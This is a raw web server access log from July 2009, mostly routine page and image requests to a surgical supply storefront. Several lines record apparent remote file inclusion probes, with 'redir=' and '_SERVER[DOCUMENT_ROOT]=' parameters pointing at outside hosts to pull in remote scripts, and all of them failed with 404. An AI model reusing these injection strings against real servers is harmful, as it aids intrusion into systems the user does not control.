172.16.1.180 - - [15/Jul/2009:07:46:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [15/Jul/2009:07:46:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /logs/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /logs/access_log.Q109070200%20%20/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:29 -0400] "GET /logs/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.103.114.5 - - [15/Jul/2009:07:46:47 -0400] "GET /logs/error_log.Q109060600%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
79.174.68.88 - - [15/Jul/2009:07:46:47 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.174.68.88 - - [15/Jul/2009:07:46:49 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.31.232.34 - - [15/Jul/2009:07:47:11 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/scrapers.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:12 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:13 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:14 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
212.31.232.34 - - [15/Jul/2009:07:47:14 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
